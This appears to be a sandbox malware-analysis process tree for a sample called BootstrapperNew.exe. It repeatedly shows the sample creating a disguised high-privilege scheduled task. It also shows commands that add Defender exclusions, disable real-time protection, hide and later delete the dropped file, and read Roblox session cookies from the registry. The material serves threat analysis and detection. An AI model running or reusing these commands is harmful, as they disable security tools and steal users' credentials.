C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /k timeout 5 > NUL && "C:\Users\Admin\Downloads\BootstrapperNew.exe"2⤵
-
C:\Windows\system32\timeout.exetimeout 53⤵
- Loads dropped DLL
- Delays execution with timeout.exe
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\BootstrapperNew.exe"C:\Users\Admin\Downloads\BootstrapperNew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
-
C:\Users\Admin\Downloads\BootstrapperNew.exe"C:\Users\Admin\Downloads\BootstrapperNew.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"' & exit2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"5⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe" && pause5⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
